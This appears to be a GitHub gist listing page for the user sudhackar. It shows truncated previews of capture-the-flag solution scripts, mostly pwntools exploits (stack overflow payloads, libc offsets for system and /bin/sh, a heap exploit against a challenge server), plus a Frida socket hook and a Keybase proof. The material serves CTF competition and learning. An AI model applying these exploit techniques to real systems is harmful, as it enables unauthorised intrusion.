Sudhakar Verma sudhackar
@sudhackar
sudhackar / easypwnie.py
Created August 20, 2016 15:37
[hackcon]easypwnie
from pwn import *
import numpy as np
import sys
'''
0x00019ad3 <+243>: mov DWORD PTR [esp],eax
0x00019ad6 <+246>: call 0x32f50 <exit>
p system
@sudhackar
sudhackar / diapers.py
Created September 11, 2016 17:27
ASIS CTF finals Diaper Simulator pwn-2
from pwn import *
local=len(sys.argv)==1
'''
0804b00c 00000107 R_386_JUMP_SLOT 00000000 printf
0804b010 00000207 R_386_JUMP_SLOT 00000000 memcpy
0804b014 00000307 R_386_JUMP_SLOT 00000000 __stack_chk_fail
0804b018 00000407 R_386_JUMP_SLOT 00000000 fread
0804b01c 00000507 R_386_JUMP_SLOT 00000000 puts
0804b020 00000607 R_386_JUMP_SLOT 00000000 __gmon_start__
0804b024 00000707 R_386_JUMP_SLOT 00000000 exit
@sudhackar
sudhackar / keybase.md
Last active February 14, 2022 13:03
Keybase

Keybase proof

I hereby claim:

  • I am sudhackar on github.
  • I am sudhackar (https://keybase.io/sudhackar) on keybase.
  • I have a public key whose fingerprint is 285B 7686 8970 789A B6D2 EAFF E6DB 7072 7521 A3FB

To claim this, I am signing this object:

@sudhackar
sudhackar / getsocial.py
Created March 25, 2017 15:58
[MITCTF] pwn-getsocial
from pwn import *
s = remote('127.0.0.1',5000)
s.recvuntil('command:')
s.sendline('2')
s.recvuntil('overwrite?')
s.sendline('2')
s.recvuntil('tweet:')
s.sendline('A'*140+p32(0x804918c))
s.recvuntil('command:')
@sudhackar
sudhackar / maze.py
Created April 27, 2017 03:52
bof on get_input()
from pwn import *
offset___libc_start_main = 0x0000000000020740
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f6d90
offset_read = 0x00000000000f6670
offset_write = 0x00000000000f66d0
offset_str_bin_sh = 0x18c177
bss = 0x00000000000130b8
game = """
.....1...1
1......0..
..0....0..
.00...0..1
1........1
...0..1...
0....1....
.......0.0
0........0
@sudhackar
sudhackar / rhme3-exp.py
Last active February 19, 2019 06:39
rhme3 CTF exploitation on heap
from pwn import *
context(arch='amd64', os='linux', log_level='info')
system_main_arena_offset = 0x37f7e8
got_strlen = 0x603040
s = remote("pwn.rhme.riscure.com",1337)
def recv_menu():
    s.recvuntil(": ")
@sudhackar
sudhackar / rhme3-whitebox.py
Last active November 14, 2018 19:59
RHME3 ctf Whitebox implementation in pure python
dword_6661C0 = [1649885203,594050925,1581470779,-1391327847,-1611275700,-1912869808,-599971129,495688880,1480676927,-2013402532,-909651928,1320857042,210015150,-1192689802,-1425012835,-232312589,-1239741301,-1142292876,-1036574509,-1996951722,-198888713,-450216471,1280137767,8427430,-1995564639,-1761340491,731483796,1029862777,1380405299,2024325110,627735913,1179343915,-700764981,1404151492,1721939426,1016365966,-86589174,1705227488,-1290268787,-1495075486,92509344,-1091895950,-2046092117,695105889,1985694731,865175172,-549704763,966230152,543784559,-1108607888,1683309079,1220063190,1464095541,681086870,-1511787424,-2146885969,242443355,-153959166,58824356,-1861873231,-1661672626,-1762466494,41377875,-1595869338,1413829175,-1978722141,580815258,-433373973,159879336,311335354,125068117,1246713891,-1138947449,344759230,1078550063,2086488583,996177789,-607527372,2007874300,462003892,444557379,1153215454,377187403,765168784,-382846495,1621145574,-48089607,1203612380,2125118962,1103079640,1968852233,-751292467,564
@sudhackar
sudhackar / frida-socket.js
Last active June 5, 2024 02:42
frida socket hook
'use strict';
var connect = new NativeFunction(
Module.findExportByName(null, "connect"),
'int',
['int', 'pointer', 'int']
);
Interceptor.replace(connect, new NativeCallback(function (sockfd, addr, addrlen) {
console.log(sockfd, addr, addrlen);
@sudhackar
sudhackar / crypto350.py
Created September 17, 2017 20:09
[CSAW CTF 2017] solution scripts for pwn and crypto
from pwn import *
context(log_level='info')
s = remote('crypto.chal.csaw.io',1578)
def send_blob(s, data):
    s.recvuntil(': ')
    s.sendline(data)
    print "sent", data
    return